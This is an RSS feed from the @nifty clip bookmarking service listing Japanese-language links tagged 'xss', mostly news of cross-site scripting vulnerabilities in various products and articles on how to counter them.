<?xml version="1.0" encoding="UTF-8"?>

<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
        xmlns="http://purl.org/rss/1.0/"
        xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/"
        xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
        xmlns:dc="http://purl.org/dc/elements/1.1/">



<channel rdf:about="http://clip.nifty.com/tag/xss">
 <title>タグ「xss」についてのクリップ一覧｜@nifty クリップ</title>
 <link>http://clip.nifty.com/tag/xss</link>
 <description>タグ：「xss」で絞り込まれたクリップ一覧です。</description>
 <items>
  <rdf:Seq>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FNEWS%2F20061113%2F253479%2F&amp;title=%E3%80%8CXSS%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AF%E5%8D%B1%E9%99%BA%EF%BC%8CCookie%E3%82%92%E7%9B%97%E3%81%BE%E3%82%8C%E3%82%8B%E3%81%A0%E3%81%91%E3%81%A7%E3%81%AF%E6%B8%88%E3%81%BE%E3%81%AA%E3%81%84%E3%80%8D%E5%B0%82%E9%96%80%E5%AE%B6%E3%81%8C%E6%B3%A8%E6%84%8F%E5%96%9A%E8%B5%B7%EF%BC%9AITpro"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fgihyo.jp%2Fdev%2Fserial%2F01%2Falpha-geek%2F0017&amp;title=%236%E3%80%80IT%E6%88%A6%E5%A3%AB%20%E5%A4%A9%E9%87%8E%20%E4%BB%81%E5%8F%B2%EF%BC%8F%E3%81%93%E3%82%93%E3%81%AB%E3%81%A1%E3%81%AF%E3%81%93%E3%82%93%E3%81%AB%E3%81%A1%E3%81%AF%EF%BC%81%20Hamachiya2%EF%BC%88%E4%B8%AD%E7%B7%A8%EF%BC%89%E3%80%80%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%E3%81%AF%E3%81%84%E3%81%8B%E3%81%AB%E3%81%97%E3%81%A6XSS%2FCSRF%E3%82%92%E8%A6%8B%E3%81%A4%E3%81%91%E3%82%8B%E3%81%8B%EF%BD%9Cgihyo.jp"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20070129%2Fipa&amp;title=%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29%20-%20%E3%81%AF%E3%81%98%E3%82%81%E3%81%A6%E3%81%AE%E3%81%BB%E3%81%86%E3%81%93%E3%81%8F"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fd2.mixi.jp%2Fview_idea.pl%3Fid%3D1983&amp;title=%E3%82%BD%E3%83%BC%E3%82%B7%E3%83%A3%E3%83%AB%E3%83%BB%E3%83%8D%E3%83%83%E3%83%88%E3%83%AF%E3%83%BC%E3%82%AD%E3%83%B3%E3%82%B0%E3%82%B5%E3%82%A4%E3%83%88%20%5Bmixi%28%E3%83%9F%E3%82%AF%E3%82%B7%E3%82%A3%29%5D%20-%20%E3%83%88%E3%83%94%E3%83%83%E3%82%AF%E6%A4%9C%E7%B4%A2%E3%81%AEXSS%E8%84%86%E5%BC%B1%E6%80%A7%E3%82%92%E4%BF%AE%E6%AD%A3%E3%81%97%E3%81%A6%E3%81%BB%E3%81%97%E3%81%84"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Finternet.watch.impress.co.jp%2Fdocs%2Fnews%2F20090820_309601.html&amp;title=%E5%85%A8%E6%96%87%E6%A4%9C%E7%B4%A2%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0%E3%80%8CNamazu%E3%80%8D%E3%80%81%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AA%E9%81%A9%E7%94%A8%E3%82%B5%E3%82%A4%E3%83%88%E3%81%ABIPA%E6%B3%A8%E6%84%8F%E5%96%9A%E8%B5%B7%20-INTERNET%20Watch"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20363167%2C00.htm&amp;title=%E6%8E%B2%E7%A4%BA%E6%9D%BF%E3%82%BD%E3%83%95%E3%83%88%E3%80%8CRainboard%E3%80%8D%E3%81%ABXSS%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7--JVN%E3%81%AA%E3%81%A9%E3%81%A7%E8%AD%A6%E5%91%8A%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2Fhasegawayosuke%2F20070404%2Fp1&amp;title=%E8%91%89%E3%81%A3%E3%81%B1%E6%97%A5%E8%A8%98%20-%20%E3%80%8C%E6%8B%A1%E5%BC%B5%E5%AD%90%E3%81%A7%E3%81%AF%E3%81%AA%E3%81%8F%E3%80%81%E5%86%85%E5%AE%B9%E3%81%AB%E3%82%88%E3%81%A3%E3%81%A6%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB%E3%82%92%E9%96%8B%E3%81%8F%E3%81%93%E3%81%A8%E3%80%8D%E3%81%AE%E6%8B%A1%E5%BC%B5%E5%AD%90%E3%81%AF%20Content-Type%20%E3%81%A7%E3%81%AF%E3%81%AA%E3%81%84%E3%81%93%E3%81%A8%E3%81%AB%E6%B3%A8%E6%84%8F"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20401818%2C00.htm&amp;title=%E3%82%B5%E3%82%A4%E3%83%9C%E3%82%A6%E3%82%BA%E8%A3%BD%E5%93%81%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fgihyo.jp%2Fdev%2Fserial%2F01%2Fphp-security%2F0007&amp;title=%E3%81%AA%E3%81%9CPHP%E3%82%A2%E3%83%97%E3%83%AA%E3%81%AB%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%9B%E3%83%BC%E3%83%AB%E3%81%8C%E5%A4%9A%E3%81%84%E3%81%AE%E3%81%8B%3F%EF%BC%9A%E7%AC%AC7%E5%9B%9E%E3%80%80%E3%81%84%E3%81%BE%E3%81%95%E3%82%89%E3%81%AA%E3%81%8C%E3%82%89%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E5%9F%BA%E7%A4%8E%E3%81%AE%E5%9F%BA%E7%A4%8E%EF%BD%9Cgihyo.jp"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20392398%2C00.htm&amp;title=Movable%20Type%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.tokumaru.org%2Fd%2F20070807.html&amp;title=%E5%BE%B3%E4%B8%B8%E6%B5%A9%E3%81%AE%E6%97%A5%E8%A8%98%20-%20mod_imagefight%E8%80%83%20-%20%E7%94%BB%E5%83%8F%E7%89%88%E3%82%B5%E3%83%8B%E3%82%BF%E3%82%A4%E3%82%BA%E8%A8%80%E3%81%86%E3%81%AA"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070401%2F267074%2F&amp;title=%E3%81%AF%E3%81%B3%E3%81%93%E3%82%8B%E3%80%8C%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%E7%B3%BB%E3%80%8D%E3%81%AE%E3%81%9C%E3%81%84%E5%BC%B1%E6%80%A7%EF%BC%9AITpro"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fq.hatena.ne.jp%2F1170218497&amp;title=%E4%BA%BA%E5%8A%9B%E6%A4%9C%E7%B4%A2%E3%81%AF%E3%81%A6%E3%81%AA%20-%20%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6%E3%81%AE%E8%B3%AA%E5%95%8F%E3%81%A7%E3%81%99%E3%80%82%20http%3A%2F%2Fhamachiya.com%2Fjunk%2Fxss.html%20xss%E3%81%8C%E5%AE%9F%E8%A1%8C%E3%81%95%E3%82%8C%E3%81%A6%E3%81%84%E3%82%8B%E3%82%89%E3%81%97%E3%81%84%E3%81%AE%E3%81%A7%E3%81%99%E3%81%8C%E3%80%81%E4%BD%95%E3%81%8C%E8%A1%8C%E3%82%8F%E3%82%8C%E3%81%A6%E3%81%84%E3%82%8B%E3%81%AE%E3%81%8B%E3%80%81%E3%82%88%E3%81%8F%E5%88%86%E3%81%8B%E3%82%8A%E3%81%BE%E3%81%9B%E3%82%93%E3%80%82.."/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fgihyo.jp%2Fdev%2Fserial%2F01%2Fphp-security%2F0011&amp;title=%E3%81%AA%E3%81%9CPHP%E3%82%A2%E3%83%97%E3%83%AA%E3%81%AB%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%9B%E3%83%BC%E3%83%AB%E3%81%8C%E5%A4%9A%E3%81%84%E3%81%AE%E3%81%8B%3F%EF%BC%9A%E7%AC%AC11%E5%9B%9E%E3%80%80%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%88%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%E3%82%92%E9%98%B2%E3%81%9010%E3%81%AETips%EF%BD%9Cgihyo.jp%20%E2%80%A6%20%E6%8A%80%E8%A1%93%E8%A9%95%E8%AB%96%E7%A4%BE"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.zdnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056194%2C20393133%2C00.htm&amp;title=Sun%E8%A3%BD%E3%82%A2%E3%83%97%E3%83%AA%E3%82%B1%E3%83%BC%E3%82%B7%E3%83%A7%E3%83%B3%E3%82%B5%E3%83%BC%E3%83%90%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%20-%20%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%20-%20ZDNet%20Japan"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070307%2F264134%2F&amp;title=%E7%AC%AC3%E5%9B%9E%E3%80%80Web%202.0%E3%81%A7%E4%BA%8B%E6%85%8B%E3%81%8C%E6%82%AA%E5%8C%96%EF%BC%9AITpro"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070409%2F267808%2F&amp;title=%E5%AF%BE%E7%AD%96%E9%81%85%E3%82%89%E3%81%9B%E3%82%8BHTML%E3%82%A8%E3%83%B3%E3%82%B3%E3%83%BC%E3%83%87%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E3%80%8C%E7%A5%9E%E8%A9%B1%E3%80%8D%EF%BC%9AITpro"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.atmarkit.co.jp%2Ffcoding%2Farticles%2Fwebapp%2F03%2Fwebapp03a.html&amp;title=%EF%BC%BB%E6%9F%94%E8%BB%9F%E3%81%99%E3%81%8E%E3%82%8B%EF%BC%BDIE%E3%81%AECSS%E8%A7%A3%E9%87%88%E3%81%A7%E8%B5%B7%E3%81%93%E3%82%8BXSS%20%EF%BC%8D%20%EF%BC%A0IT"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.kajisoku.net%2F1%2Farchives%2Feid272.html&amp;title=%E2%8A%82%E2%8C%92%E2%8A%83%EF%BD%A1%D0%94%EF%BD%A1%29%E2%8A%83%E3%82%AB%E3%82%B8%E9%80%9F%E2%89%A1%E2%89%A1%E2%89%A1%E2%8A%82%E2%8C%92%E3%81%A4%EF%BE%9F%D0%94%EF%BE%9F%29%E3%81%A4Full%20Auto%20%7C%20%E3%82%BB%E3%83%96%E3%83%B3%E3%82%A2%E3%83%B3%E3%83%89%E3%83%AF%E3%82%A4%E3%80%81Google%E6%A4%9C%E7%B4%A2%E3%81%A7%E5%80%8B%E4%BA%BA%E6%83%85%E5%A0%B1%E3%81%8C%E4%B8%B8%E8%A6%8B%E3%81%88%E3%81%A0%E3%81%A3%E3%81%9F%E6%A8%A1%E6%A7%98%E3%80%82%E3%81%BE%E3%81%9F%E4%BB%8A%E5%9B%9E%E3%81%AE%E4%BB%B6%E3%81%A7%E3%82%A2%E3%83%95%E3%82%A3%E3%83%AA%E3%82%A8%E3%82%A4%E3%83%88%E3%81%AB%E3%81%BE%E3%81%A7%E5%BD%B1%E9%9F%BF%E3%81%8C%E5%87%BA%E3%82%8B%E3%80%82"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20080804%2Fsecurity&amp;title=%E5%80%8B%E4%BA%BA%E3%81%A0%E3%81%8B%E3%82%89%E7%94%98%E3%81%84%E3%81%AE%E3%81%8B%E3%81%AA%20-%20%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20388926%2C00.htm&amp;title=PEAK%20XOOPS%E8%A3%BD%E3%80%8CpiCal%E3%80%8D%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FIwamotoTakashi%2F20090927%2Fp1&amp;title=XSS%E5%AF%BE%E7%AD%96%E3%83%91%E3%83%83%E3%83%81%E3%82%92%E5%BD%93%E3%81%A6%E3%81%A6%E3%82%82Rails%E3%81%AB%E6%AE%8B%E3%82%8B%E8%84%86%E5%BC%B1%E6%80%A7%20-%20%E5%B2%A9%E6%9C%AC%E9%9A%86%E5%8F%B2%E3%81%AE%E6%97%A5%E8%A8%98%E5%B8%B3"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fmxxi.hamachiya.com%2F2006%2F08%2Fxss_1.html&amp;title=XSS%20-%20%E8%A1%A8%E7%A4%BA%E7%B3%BB%E3%83%91%E3%83%A9%E3%83%A1%E3%83%BC%E3%82%BF%E3%81%AB%E5%AD%98%E5%9C%A8%E3%81%99%E3%82%8B%E7%9B%B2%E7%82%B9%20%3A%3A%20%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Flabs.cybozu.co.jp%2Fblog%2Fakky%2Farchives%2F2006%2F10%2Fgoogle_code_search_hacks.html&amp;title=%E7%A7%8B%E5%85%83%40%E3%82%B5%E3%82%A4%E3%83%9C%E3%82%A6%E3%82%BA%E3%83%A9%E3%83%9C%E3%83%BB%E3%83%97%E3%83%AD%E3%82%B0%E3%83%A9%E3%83%9E%E3%83%BC%E3%83%BB%E3%83%96%E3%83%AD%E3%82%B0%3A%20Google%20Code%20Search%20%E3%81%AE%E3%82%A2%E3%83%AC%E3%81%AA%E6%B4%BB%E7%94%A8%E6%B3%95%E3%81%8C%E7%B6%9A%E3%80%85%E3%81%A8"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.itmedia.co.jp%2Fnews%2Farticles%2F0904%2F13%2Fnews029.html&amp;title=%E3%80%8CSamy%E3%80%8D%E3%81%A8%E5%90%8C%E7%A8%AE%E3%81%AE%E3%83%AF%E3%83%BC%E3%83%A0%EF%BC%9ATwitter%E3%80%81XSS%E6%94%BB%E6%92%83%E3%81%AE%E6%A8%99%E7%9A%84%E3%81%AB%20-%20ITmedia%20News"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fskmwin.net%2Farchives%2F002983.html&amp;title=Sukima%20Windows%20Plus%3A%20%E3%80%8C%E4%BA%BA%E5%8A%9B%E6%A4%9C%E7%B4%A2%E3%81%AF%E3%81%A6%E3%81%AA%E3%80%8D%E3%81%AB%E4%BB%BB%E6%84%8F%E3%81%AE%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%88%E3%82%92%E5%AE%9F%E8%A1%8C%E3%81%A7%E3%81%8D%E3%81%A6%E3%81%97%E3%81%BE%E3%81%86%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%8C"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070419%2F268793%2F&amp;title=%E6%9C%AA%E7%9F%A5%E3%81%AE%E3%81%9C%E3%81%84%E5%BC%B1%E6%80%A7%E3%82%92%E7%99%BA%E8%A6%8B%E3%81%97%E3%81%9F%E3%80%82%E3%81%A9%E3%83%BC%E3%81%99%E3%82%93%E3%81%AE%EF%BC%81%EF%BC%9F%E3%82%AA%E3%83%AC%EF%BC%88%E3%81%9D%E3%81%AE1%EF%BC%89%EF%BC%9AITpro"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2Fantipop%2F20070804%2F1186154750&amp;title=antipop%20-%20HTML%3A%3AStripScripts%E3%81%A7XSS%E5%AF%BE%E7%AD%96%E3%82%92%E3%81%99%E3%82%8B"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fit.nikkei.co.jp%2Fsecurity%2Fnews%2Findex.aspx%3Fn%3DMMIT2g000021082008&amp;title=%E3%81%A4%E3%81%84%E3%81%AB%E8%B5%B7%E3%81%8D%E3%81%9F%EF%BC%B8%EF%BC%B3%EF%BC%B3%E6%94%BB%E6%92%83%E3%83%BB%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%BC%E3%81%AF%EF%BC%91%E6%97%A5%E3%81%AB%E3%81%97%E3%81%A6%E3%81%AA%E3%82%89%E3%81%9A%20%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%BC-%E6%9C%80%E6%96%B0%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%3AIT-PLUS"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fgihyo.jp%2Fadmin%2Fserial%2F01%2Fcharcode%2F0001&amp;title=%E6%9C%AC%E5%BD%93%E3%81%AF%E6%80%96%E3%81%84%E6%96%87%E5%AD%97%E3%82%B3%E3%83%BC%E3%83%89%E3%81%AE%E8%A9%B1%EF%BC%9A%E7%AC%AC1%E5%9B%9E%E3%80%80UTF-7%E3%81%AB%E3%82%88%E3%82%8B%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E6%94%BB%E6%92%83%EF%BC%BB%E5%89%8D%E7%B7%A8%EF%BC%BD%EF%BD%9Cgihyo.jp%20%E2%80%A6%20%E6%8A%80%E8%A1%93%E8%A9%95%E8%AB%96%E7%A4%BE"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fmedia%2Fstory%2F0%2C2000056023%2C20376601%2C00.htm&amp;title=%E3%82%B0%E3%83%BC%E3%82%B0%E3%83%AB%E3%80%81%E3%82%A6%E3%82%A7%E3%83%96%E8%84%86%E5%BC%B1%E6%80%A7%E6%A4%9C%E7%9F%A5%E3%83%84%E3%83%BC%E3%83%AB%E3%80%8CRatProxy%E3%80%8D%E3%82%92%E3%83%AA%E3%83%AA%E3%83%BC%E3%82%B9%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20395680%2C00.htm&amp;title=%E3%83%AC%E3%83%83%E3%83%84PHP%21%E3%81%AEBBS%E3%82%BD%E3%83%95%E3%83%88%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fkinshachi.ddo.jp%2Fkurage%2Fhtml%2FMT%2Fcomp%2Farchives%2F000445.html&amp;title=%E3%82%B3%E3%83%B3%E3%83%94%E3%83%A5%E3%83%BC%E3%82%BF%E7%B3%BBblog%3A%20%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E5%AF%BE%E7%AD%96"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20363171%2C00.htm&amp;title=%E3%82%B5%E3%82%A4%E3%83%9C%E3%82%A6%E3%82%BAOffice%E3%82%84%E3%82%AC%E3%83%AB%E3%83%BC%E3%83%B3%E3%81%AB%E8%84%86%E5%BC%B1%E6%80%A7--XSS%E3%82%84HTTP%E3%83%98%E3%83%83%E3%83%80%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%E3%81%AA%E3%81%A9%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.zdnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056194%2C20388111%2C00.htm&amp;title=%E3%83%9E%E3%82%A4%E3%82%AF%E3%83%AD%E3%82%BD%E3%83%95%E3%83%88%E3%81%AE%E6%A4%9C%E7%B4%A2%E3%83%97%E3%83%A9%E3%83%83%E3%83%88%E3%83%95%E3%82%A9%E3%83%BC%E3%83%A0%E3%80%8CFAST%20ESP%E3%80%8D%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%20-%20ZDNet%20Japan"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Finternet.watch.impress.co.jp%2Fcda%2Fnews%2F2007%2F02%2F02%2F14669.html&amp;title=IPA%E3%80%81%E3%82%BB%E3%83%9F%E3%83%8A%E3%83%BC%E5%8F%97%E4%BB%98%E3%83%95%E3%82%A9%E3%83%BC%E3%83%A0%E3%81%ABXSS%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%8C%E8%A6%8B%E3%81%A4%E3%81%8B%E3%82%8B"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20395678%2C00.htm&amp;title=%E3%83%96%E3%83%AD%E3%82%B0%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0%E3%80%8CMovable%20Type%E3%80%8D%E3%81%AB%E8%A4%87%E6%95%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.ipa.go.jp%2Fsecurity%2Fvuln%2F7incidents%2F&amp;title=%E6%83%85%E5%A0%B1%E5%87%A6%E7%90%86%E6%8E%A8%E9%80%B2%E6%A9%9F%E6%A7%8B%EF%BC%9A%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%EF%BC%9A%E8%84%86%E5%BC%B1%E6%80%A7%E5%AF%BE%E7%AD%96%EF%BC%9A%E5%AE%89%E5%85%A8%E3%81%AA%E3%82%A6%E3%82%A7%E3%83%96%E3%82%B5%E3%82%A4%E3%83%88%E9%81%8B%E5%96%B6%E5%85%A5%E9%96%80"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fhatenadiary.g.hatena.ne.jp%2Fkeyword%2F%25e3%2581%25af%25e3%2581%25a6%25e3%2581%25aa%25e3%2583%2580%25e3%2582%25a4%25e3%2582%25a2%25e3%2583%25aa%25e3%2583%25bcXSS%25e5%25af%25be%25e7%25ad%2596&amp;title=%E3%81%AF%E3%81%A6%E3%81%AA%E3%83%80%E3%82%A4%E3%82%A2%E3%83%AA%E3%83%BC%E3%81%AE%E3%83%98%E3%83%AB%E3%83%97%20-%20%E3%81%AF%E3%81%A6%E3%81%AA%E3%83%80%E3%82%A4%E3%82%A2%E3%83%AA%E3%83%BCXSS%E5%AF%BE%E7%AD%96"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20070131%2Fipa3&amp;title=%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29%20-%20IPA%E3%81%9F%E3%82%93%E3%81%8B%E3%82%89%E3%81%B8%E3%82%93%E3%81%98%E3%81%93%E3%81%AA%E3%81%84"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20070409%2Faist&amp;title=%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29%20-%20%E5%AE%89%E5%85%A8%E3%81%AAWeb%E3%82%B5%E3%82%A4%E3%83%88%E5%88%A9%E7%94%A8%E3%81%AE%E9%89%84%E5%89%87"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fblog.ohgaki.net%2Findex.php%2Fyohgaki%2F2007%2F10%2F13%2Fa_a_a_a_ac_a_a_pa_xssa_a_a_a_fa_a&amp;title=yohgaki%27s%20blog%20-%20%E3%81%84%E3%82%8D%E3%81%84%E3%82%8D%E5%A4%89%E3%82%8F%E3%81%A3%E3%81%9FXSS%E3%81%8C%E3%81%82%E3%82%8A%E3%81%BE%E3%81%99%E3%81%8C..."/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fhatena.g.hatena.ne.jp%2Fhatenabookmark%2F20060822%2F1156213127&amp;title=%E6%A9%9F%E8%83%BD%E5%A4%89%E6%9B%B4%E3%80%81%E3%81%8A%E7%9F%A5%E3%82%89%E3%81%9B%E3%81%AA%E3%81%A9%20-%20%E3%81%AF%E3%81%A6%E3%81%AA%E3%83%96%E3%83%83%E3%82%AF%E3%83%9E%E3%83%BC%E3%82%AF%E6%97%A5%E8%A8%98%20-%20XSS%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AE%E4%BF%AE%E6%AD%A3%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6"/>
